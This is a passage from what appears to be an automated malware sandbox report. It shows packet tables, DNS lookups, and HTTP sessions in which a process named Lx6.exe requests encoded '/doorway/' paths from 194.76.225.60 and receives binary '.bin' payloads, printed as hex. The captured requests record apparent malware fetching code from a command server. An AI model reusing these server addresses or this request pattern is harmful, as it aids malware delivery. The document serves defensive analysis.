Oct 11, 2022 15:04:23.409004927 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.409024954 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.409041882 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.409058094 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.409065008 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.409090996 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.409106016 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.409122944 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.410028934 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.410048008 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.410062075 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.410073042 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.410103083 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.410125971 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.412715912 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.412736893 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.412758112 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.412774086 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.412796974 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.412806034 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.413326979 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.413347006 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.413363934 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.413372040 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.413377047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.413399935 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.413430929 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.414630890 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.414650917 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.414669037 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.414680958 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.414714098 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.415326118 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.415344954 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.415361881 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.415380001 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.415380001 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.415410995 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.415416956 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.415425062 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.415457010 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416378975 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416404963 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416420937 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416434050 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416445017 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416450024 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416466951 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416485071 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416496038 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.416608095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416608095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416608095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416608095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.416608095 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.418369055 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.418394089 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.418410063 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.418422937 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.418482065 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.418482065 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.420038939 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420059919 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420077085 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420120001 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.420150042 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.420157909 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420243979 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420263052 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420293093 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.420295954 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420310020 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.420315981 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.420327902 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.421432018 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.421452999 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.421468973 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.421504974 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.421531916 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.421545029 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.421557903 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.421586037 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.422808886 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.422830105 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.422866106 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.422885895 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.422903061 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.422904015 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.422924995 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.423479080 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.423500061 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.423516035 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.423528910 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.423547029 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.423573971 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:04:23.424139023 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:04:23.424201965 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:05:22.646934032 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:05:22.673618078 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:05:22.864103079 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:05:22.864959002 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:05:28.582719088 CEST	80	49702	204.79.197.203	192.168.2.4
Oct 11, 2022 15:05:50.248882055 CEST	49703	80	192.168.2.4	194.76.225.61
Oct 11, 2022 15:05:50.275526047 CEST	80	49703	194.76.225.61	192.168.2.4
Oct 11, 2022 15:05:50.275612116 CEST	49703	80	192.168.2.4	194.76.225.61

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 11, 2022 15:01:36.531193018 CEST	50911	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:01:36.707911015 CEST	59683	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.568264008 CEST	64167	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.901148081 CEST	58565	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:05.918076038 CEST	53	58565	8.8.8.8	192.168.2.4
Oct 11, 2022 15:04:28.375722885 CEST	58566	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:28.394582033 CEST	53	58566	8.8.8.8	192.168.2.4
Oct 11, 2022 15:04:28.398575068 CEST	58567	53	192.168.2.4	8.8.8.8
Oct 11, 2022 15:04:28.417346001 CEST	53	58567	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 11, 2022 15:01:36.531193018 CEST	192.168.2.4	8.8.8.8	0xe9f7	Standard query (0)	tel12.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:01:36.707911015 CEST	192.168.2.4	8.8.8.8	0xb225	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:05.568264008 CEST	192.168.2.4	8.8.8.8	0xd053	Standard query (0)	apnfy.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:05.901148081 CEST	192.168.2.4	8.8.8.8	0xd021	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:28.375722885 CEST	192.168.2.4	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 11, 2022 15:04:28.398575068 CEST	192.168.2.4	8.8.8.8	0x2	Standard query (0)	1.0.0.127.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 11, 2022 15:01:36.567296028 CEST	8.8.8.8	192.168.2.4	0xe9f7	No error (0)	tel12.msn.com	redirection.prod.cms.msn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.567296028 CEST	8.8.8.8	192.168.2.4	0xe9f7	No error (0)	redirection.prod.cms.msn.com	redirection.prod.cms.msn.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.724606991 CEST	8.8.8.8	192.168.2.4	0xb225	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:01:36.724606991 CEST	8.8.8.8	192.168.2.4	0xb225	No error (0)	www-msn-com.a-0003.a-msedge.net	icePrime.a-0003.dc-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.746361017 CEST	8.8.8.8	192.168.2.4	0xd053	No error (0)	apnfy.msn.com	redirection.prod.cms.msn.com		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.746361017 CEST	8.8.8.8	192.168.2.4	0xd053	No error (0)	redirection.prod.cms.msn.com	redirection.prod.cms.msn.com.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	www-msn-com.a-0003.a-msedge.net	a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Oct 11, 2022 15:04:05.918076038 CEST	8.8.8.8	192.168.2.4	0xd021	No error (0)	a-0003.a-msedge.net		204.79.197.203	A (IP address)	IN (0x0001)	false
Oct 11, 2022 15:04:28.394582033 CEST	8.8.8.8	192.168.2.4	0x1	No error (0)	8.8.8.8.in-addr.arpa			PTR (Pointer record)	IN (0x0001)	false
Oct 11, 2022 15:04:28.417346001 CEST	8.8.8.8	192.168.2.4	0x2	Name error (3)	1.0.0.127.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

194.76.225.60

www.msn.com

194.76.225.61

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49700	194.76.225.60	80	C:\Users\user\Desktop\Lx6.exe

Timestamp	kBytes transferred	Direction	Data
Oct 11, 2022 15:01:57.902332067 CEST	416	OUT	GET /doorway/j2Kh1F01rzc/C8YfqfqOL0fd_2/Faja_2BeyQazoCIhY8EM9/jtWW9dUBZLJi2O8c/5bSyBdVOxMEWaUX/ShuObsG4WHyjfvJOvS/7Etsx6H8b/xJ9ufj3B90qCwQfbGxOr/E6EEqhpsHuAJvMjEWxJ/bbt9tD_2FAMRZ0X6mUy9CA/ykkOKoxULnECB/ejdchRP6/xdR6yPCPWIpLVR5uBosZgJc/ZByIsZgREK/Fk_2Feeg2_2Bk9KT9/iLNnOQl_2B8z/5ltZk0GHQaA/kR9XvP8sc8BQlA/LXFn1z6p/VlTMdML3/9.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.113888025 CEST	417	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:58 GMT Content-Type: application/octet-stream Content-Length: 181405 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="63456946168f5.bin" Data Raw: 77 cb f2 ef ac ff 08 91 16 18 ee e3 e3 67 7b dc 6d 1e 1b 98 69 1d 6e a9 f9 35 71 f4 6b 19 ec be c4 6b ac 18 fa c6 45 1e 9f db 70 45 a0 04 a6 6d 1a b1 51 e1 f5 99 09 f6 91 13 ef f9 b1 70 5a 88 82 35 2b 90 e5 ec 1b 56 c3 d0 a2 fc db 07 e4 84 53 cb 07 f4 9a 7b 88 d3 c8 60 32 2f 76 84 20 05 f1 ee 0d 6e cb 9a ba ce a5 8a ee 1e 74 45 cc 38 37 68 c1 8d 9f 0f 7b 10 84 53 46 73 a7 bf d6 7c d7 ee 52 26 45 38 06 3a 86 1f 6b 16 65 6a 7b a5 64 dc cd 68 04 ac 25 38 3e ce 93 e7 15 b7 f1 58 c0 bb 07 10 f9 c8 74 8c c0 72 39 75 d8 69 ee 81 7a ab b8 32 cd e8 8a 0c 80 62 61 ca 0c 21 93 69 80 27 31 1b 62 cd 44 77 fa 24 cb a5 7b 1b 2e 6a 9d df 99 43 53 2f 7e 29 a7 ed 3f 09 4f b8 43 5e 92 99 e5 78 25 d4 a9 12 bc 32 a3 60 1d 42 0e cc 66 a7 83 81 d6 79 fd a7 79 27 c8 a4 b3 9a 2a 18 8a de 2c 20 91 18 94 6c c3 e1 09 51 12 ee 2a 88 c0 b4 7b 9f 26 6d 7b d4 a2 d4 ef 7d 50 69 48 b2 8c 87 85 ec 3d 56 92 e9 56 14 e4 42 3a 50 76 4e 12 83 9b dd c8 07 72 42 9f 2a c8 08 03 a3 70 ba e2 ca be b9 5b 99 4b 66 f3 fc de 34 e3 69 c2 9e 2c c7 ca 25 31 73 13 a8 40 56 16 04 09 b8 ba d4 f0 e5 25 71 e7 08 e0 73 2b a8 c2 c2 f3 4c a3 23 48 fe 79 f0 f8 8e ad 81 bc 96 c2 1e bd 56 84 69 bd 19 5e f4 04 d8 6e d7 f5 c9 b1 f0 af 1c 0c 9f cf fe c6 09 7a 59 4b c3 e5 ac 1d ae 7a 90 6d 58 05 d4 92 b3 7f 5e 88 62 0f 84 e4 20 c4 46 47 f0 a2 86 0d a3 cd d8 00 eb 7f ee 60 ab 84 db 99 91 0d 0f 4c da f3 82 bf d6 d7 5d ef 4e 17 f1 75 c0 c0 4e 96 5d 34 59 cf 7e fd 18 58 3f e1 ca 8c d5 b3 a5 cb 7a 39 10 34 c0 50 c4 e6 08 23 53 67 cc 56 8b 5c 87 2e e8 77 5a 6f c5 f9 07 fe 6f 7a 05 09 59 e6 f9 0f 7c 16 73 10 d2 1a d9 ab 5f f7 ed 6b f9 20 e7 3d 7e 84 c9 64 71 b4 33 8f 81 1f 2a 43 99 32 eb 62 78 bb 0b 29 a4 e8 ce 23 bc d0 ea bc ee 69 43 ee 90 9c 39 83 69 0a e0 70 de 2c 17 80 4d fa 19 ef c3 6f 7a d5 95 2a 76 7a 36 c6 ab 54 d3 95 3b 40 a5 34 04 11 54 a6 ab 69 6b fe 06 88 37 4f 4a db cd fe 7f ea 17 a4 38 1c 3b a0 3f 7e f2 d0 b8 f6 36 d2 b2 d9 36 8f 4e b9 a0 de d1 79 2b 6c 7f 6f 2c 24 d4 e3 0c c6 3f 5f d1 77 b9 d4 9c 31 9c 02 40 da e6 bd f0 d2 0f 99 60 78 db 6e 43 43 23 e6 ab ce d9 e3 5d d1 7c 0f 31 3d 8b 85 33 20 0c d5 88 66 61 54 1b 0a b1 4d 32 3e d3 ba 57 c0 fe 93 60 61 21 53 ff d2 5e 61 a0 ac 01 d4 17 82 8b 7c 79 b3 76 0c d1 37 25 75 af 24 39 4a f4 de aa ed e1 31 0a 57 dd 33 0d 46 25 7e b9 a9 a5 eb 71 0a d8 68 2c 9e 1f 48 70 b1 81 7f 4e 0c 6d cf 06 30 6f 2a 9f b3 78 db 01 8d ac a7 b4 2e de 9e 88 52 a8 ed 9d 04 1a 56 a3 d9 51 a0 92 af ce 3f c6 fe ec 38 c2 94 69 cf 68 3d 4d af 28 81 c6 17 34 3b bb 9f c3 22 50 ed fd 4e e0 11 39 8e a4 da f0 eb f7 de 19 fc 62 f0 22 db e5 f1 4f bc 78 f1 7a d4 99 3c 78 88 9e 3d 40 ab c4 25 bd f5 50 2b 97 ca a7 24 87 91 5e d1 88 62 6e 2f 6b ec 70 dc 5d f9 91 12 45 ee 1d 79 e8 6a 6a c6 5d 78 72 e8 1b 19 54 63 d8 2f f3 2e 26 ef 25 ea 29 46 91 8b c2 24 ef 06 c4 ab 9c 26 1a 75 d4 da 3d 0d b3 75 5e f4 ce 33 bb f1 60 23 75 ac 29 fd Data Ascii: wg{min5qkkEpEmQpZ5+VS{`2/v ntE87h{SFs\|R&E8:kej{dh%8>Xtr9uiz2ba!i'1bDw${.jCS/~)?OC^x%2`Bfyy', lQ{&m{}PiH=VVB:PvNrBp[Kf4i,%1s@V%qs+L#HyVi^nzYKzmX^b FG`L]NuN]4Y~X?z94P#SgV\.wZoozY\|s_k =~dq3C2bx)#iC9ip,Mozvz6T;@4Tik7OJ8;?~66Ny+lo,$?_w1@`xnCC#]\|1=3 faTM2>W`a!S^a\|yv7%u$9J1W3F%~qh,HpNm0ox.RVQ?8ih=M(4;"PN9b"Oxz<x=@%P+$^bn/kp]Eyjj]xrTc/.&%)F$&u=u^3`#u)
Oct 11, 2022 15:01:58.113917112 CEST	418	IN	Data Raw: 61 0c ee d6 57 58 bb 18 00 4f 22 63 bd 0a 2f 5e fc fd 8c 01 d1 46 75 c4 86 e6 ae 88 70 f0 e4 e5 a7 d0 88 40 fd fa c6 fc 92 8d 8c 6e 86 05 30 33 7c 2f 65 50 ef f8 3d 5e e7 3e 8e 00 23 e6 42 5a eb 47 a3 83 ae 7f a5 45 41 a7 47 04 e9 70 d2 70 a1 f9 Data Ascii: aWXO"c/^Fup@n03\|/eP=^>#BZGEAGpprZ:REYh6}Rf&D]AB,6xLUf@$hgwK5gkYEUYU]*O[6fQ7VrX")vNh+ TbOzeJ]VV_
Oct 11, 2022 15:01:58.114145041 CEST	420	IN	Data Raw: 70 93 68 2e 88 8f 25 f2 14 80 a9 a9 c2 1f 7a 1f e2 d7 07 35 34 36 d3 e2 26 6a 64 6e a0 ec 4e ba 42 b9 b4 ff 3d 17 67 3a 93 bb 2b 8e 41 9b 86 6d e1 88 34 de cf 60 0e 95 69 0a 36 2a fb e9 f8 2c 42 b4 10 41 ca 12 6d 5f 09 86 3f c4 80 45 25 01 d6 3f Data Ascii: ph.%z546&jdnNB=g:+Am4`i6*,BAm_?E%?D?)EDi?-RBKn!`f_tf@>[W.lsUOuj'xe@.SBm+dtE(zE9e?# \IBy
Oct 11, 2022 15:01:58.114213943 CEST	421	IN	Data Raw: 29 3e 3d 5a 4a 6e 52 c3 5c 6d 43 62 0e 78 4f 18 09 3f d2 e1 37 a3 94 1b 17 28 48 11 6a 31 75 6d 44 a2 db a5 ce 29 1c 74 1e 19 0d 03 1d 90 de a0 df 58 0b 46 77 ec d0 59 e9 89 1d cf 66 45 88 46 38 ba 34 f0 2b 96 fa f2 35 b4 52 fc 52 c8 3e 73 68 a8 Data Ascii: )>=ZJnR\mCbxO?7(Hj1umD)tXFwYfEF84+5RR>sh+y~>VPp_rS-haxX1Dnp>F=f{^wHH(H6:i_#Y!L>F{NOB.=Aj,$'u}@+l]s+
Oct 11, 2022 15:01:58.114490032 CEST	423	IN	Data Raw: 6c da 88 56 ae f0 ce b2 6a ee ae 6d d0 d7 e0 e6 83 a2 5d 6a da 9e 36 23 05 40 07 92 5d 8f cf a2 88 d9 4d 18 70 c0 79 af f0 f2 7c 49 94 41 f9 fe 15 e9 c7 85 87 dd 08 5b 5d 4f 78 57 24 f0 49 d8 fa a5 b1 4f 4a 05 f3 eb 5c 7f 24 57 96 62 95 fe 41 9e Data Ascii: lVjm]j6#@]Mpy\|IA[]OxW$IOJ\$WbA7[J<@L]CWXLSl YDsUF~bb0Mz1lVcfg^)}0Hw]L$X7)7/1@TXL-)tW%+us{*&;8CUm:(n?
Oct 11, 2022 15:01:58.114511967 CEST	424	IN	Data Raw: 15 9e 56 f0 b1 70 98 82 1a 5b 78 87 a6 8b 37 74 cb 86 50 46 52 31 63 14 6a 0b 40 3f 89 ba 9c 4f 9a 35 86 36 74 97 5b 6e be 74 30 59 4e 87 fb 6a e7 ec 75 1b 5c da 2d c5 cb de 52 63 87 2f b8 21 66 8b 63 27 ac 8c 9e b7 81 00 1f 1f 10 05 06 84 60 d4 Data Ascii: Vp[x7tPFR1cj@?O56t[nt0YNju\-Rc/!fc'`RN2U3Th$2QfyF:+03rdSPHe8~1Q:eATohD$:3*<t9Lv/-T ] LRk\|9Fz7
Oct 11, 2022 15:01:58.114953995 CEST	425	IN	Data Raw: 6a eb 56 47 55 97 e6 70 f9 a6 df 40 31 f4 f2 e5 97 99 7c 72 ab 59 31 58 ad 3a fa 55 96 41 5b 89 a2 0b 72 6f d6 28 6c 49 bf 7a 8b 82 76 41 f5 dd a5 58 f0 98 04 37 d4 7a 32 ea 8f c4 b4 46 3e bc 59 ff aa 9e 46 9c 2a a5 7a 67 48 56 36 44 36 32 6b 4d Data Ascii: jVGUp@1\|rY1X:UA[ro(lIzvAX7z2F>YFzgHV6D62kM#zUf+m(fg34)B,urZ[zJpz5d'`ZbDF@v2s(2j1~4zw$Fs~:(35w..I/e1w9t
Oct 11, 2022 15:01:58.115010023 CEST	426	IN	Data Raw: 23 cb 1c 36 97 ee 30 ae dd 65 6f 05 d4 e7 af 78 fa 23 72 41 92 ae b9 1e 64 16 27 7c d9 53 50 33 aa 19 41 4c eb 56 c0 0f 5a b7 ce 7e 76 db d5 55 2e a4 44 51 d8 d9 ca 44 7b 72 0f cd 54 8d 34 c6 c1 9f 8a 3f 6d 43 a5 48 95 9d 9f 99 c5 43 2f fe cb b8 Data Ascii: #60eox#rAd'\|SP3ALVZ~vU.DQD{rT4?mCHC/SxhLZ%_2/X,}-FyWjB@#0`*SjLA)@YbgDyNZAu`J0qq3\j[]kNu
Oct 11, 2022 15:01:58.115109921 CEST	427	IN	Data Raw: 4e 1f ae 53 5c 19 5b e5 b8 bc 47 e8 d0 d9 a3 48 f1 34 ca 4c 8e f9 81 ef 13 cb 16 d2 2f f8 2e ef b7 58 34 ea 07 4e 67 3c 8d 30 d6 ea 2b 7c 0d cb 8e a1 ad b8 ea f1 ec 01 2a fe f7 2e 0e 99 fc 40 34 a8 95 4f 2e c8 e1 f8 92 63 9b ad f3 86 30 79 87 bb Data Ascii: NS\[GH4L/.X4Ng<0+\|*.@4O.c0yG\\l=v2,gKg}<}S1>xCy_>q;&W-ck<QS{wh+^Qth8.><)W'[:T,Zf@ '&@-x4
Oct 11, 2022 15:01:58.115336895 CEST	429	IN	Data Raw: 3c 52 9e 38 3e d4 66 ae 5b 5a 30 e7 c0 03 12 13 1e 99 66 ad e7 a3 de bf a7 26 a2 51 c7 f6 bd 7c 1e de c8 7e 34 a5 9c 11 68 14 05 4b 58 fc c3 65 bf 7c 56 83 27 21 75 f3 20 fa f3 22 0f 45 f0 c4 e7 de cc 04 34 90 ea 5f 02 c4 a7 e7 51 e4 5b 25 fb a0 Data Ascii: <R8>f[Z0f&Q\|~4hKXe\|V'!u "E4_Q[%h+e9)Xl~prXQI$K*6YTi+4 bn?"l7`gtY5j6yY'C<:D2&4Nhr<{%/7W<T[
Oct 11, 2022 15:01:58.141719103 CEST	430	IN	Data Raw: 5f 8c 5e f5 cf c7 0a 66 e5 ae ed e4 e8 78 e9 eb c4 5c 96 dd 5e 89 d5 87 d2 57 5d 18 68 0b b5 22 9c 7e 1f 57 08 58 e9 e9 1b ee 6d af af ee 3f 03 1a 24 03 eb 83 01 c0 15 b7 aa b1 d3 5a 29 66 09 a2 54 3b 9c 94 9a 62 7a 20 2a 76 ac 43 3e 5c e3 c9 57 Data Ascii: _^fx\^W]h"~WXm?$Z)fT;bz *vC>\WTax` k1;mG8dI'1>H8,hgh2?c_S"bi,9D^^U^)S_+"O+s>\r_\PsWbB^M
Oct 11, 2022 15:01:58.227384090 CEST	611	OUT	GET /doorway/BIhFC1DHq0NxSqN_2Fq5v/hicggKY4SgwJPP6D/F4xxZuIhTddt0HO/A_2B6u1ukXktqk9I1N/03tCA2eZF/F2lX7Km3UL6Oc40qXR7I/S_2Bu_2F1gAnwxNSHl_/2B_2BIw1VXdQgjLWDGSvzH/6KsVMipemRsxc/s39L4jXr/llySx2Z4YWz6hWH3fehvPN_/2B4i_2B9D9/MRxPcto8_2FTKi6Ul/Lo0znElngJCM/KVK8xvLBVm9/FogU94tV1Oz3NS/xOy9YP2f0yNELqTpaSapG/CGthTWmcja_2By_2/BWnMuFbG2_2/FigtxC.drr HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 194.76.225.60 Connection: Keep-Alive Cache-Control: no-cache
Oct 11, 2022 15:01:58.431793928 CEST	613	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 11 Oct 2022 13:01:58 GMT Content-Type: application/octet-stream Content-Length: 233105 Connection: keep-alive Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: inline; filename="634569466442b.bin" Data Raw: b0 de 4f 49 3e 24 d7 25 8f 5f 32 cb 68 d0 f4 93 af f0 7f 50 64 1d fb 9c 51 47 b4 37 b4 c3 b3 f2 09 f9 64 44 05 e5 ed 84 78 d9 45 a6 f9 2d 18 c3 5e 5f df 2b 4c ec 3b ba 3d 44 d0 f2 1a d5 df f7 0d 15 3c b7 8e c0 c2 ff d0 0b da e3 7f 42 b0 bf 11 3d 60 17 af d1 a5 4d ad 0b 70 61 cc 77 74 11 55 8f 1c 17 3d d4 b3 56 52 46 4e 66 ae 4b 1d ea 18 a4 f3 0d fc 81 df 1c 6a 05 49 87 38 b8 e9 c6 29 5d 1e b3 68 5f f8 47 25 64 f8 47 da 6d cc 5b cb f9 42 9c 04 17 3f a7 ec 18 cd 62 cf 82 99 f3 48 a5 bb 22 98 d4 c5 1c 82 3a 97 e8 c4 11 d7 61 fd 67 7b 08 6b c8 25 98 15 11 9b c6 cb 2f 74 c8 f0 67 8c 07 36 69 01 b2 51 56 e2 22 39 2d 64 a1 a3 56 c5 7a 4e b8 6d fa d7 f7 c4 94 70 17 fe c5 d9 c3 2d e4 6f 2c 4a 36 3b 4f 85 b9 a3 df 9c 3d 04 fd d3 2c b6 7b 89 27 ac eb 85 f5 f2 e3 78 73 f8 06 00 c8 88 01 62 35 a3 